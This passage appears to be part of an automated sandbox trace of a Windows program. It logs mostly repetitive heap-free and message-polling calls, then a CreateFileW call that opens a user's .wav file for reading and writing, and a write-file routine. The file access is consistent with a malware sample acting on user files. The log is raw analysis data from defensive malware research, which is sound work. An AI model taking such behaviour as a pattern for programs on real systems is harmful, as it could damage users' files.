dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0186.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0186.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0186.668] FreeLibrary (hLibModule=0x75c90000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0186.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.669] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.669] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0186.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0186.670] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.670] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0186.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0186.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.672] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0186.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.673] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0186.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.674] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.674] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.674] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0186.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.675] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.675] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0186.675] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.676] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\y3qznbvqkq2ur4uosf8q.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0186.676] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.677] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.677] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0186.677] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.677] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.679] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.679] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.679] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.679] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.679] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.679] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0186.679] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 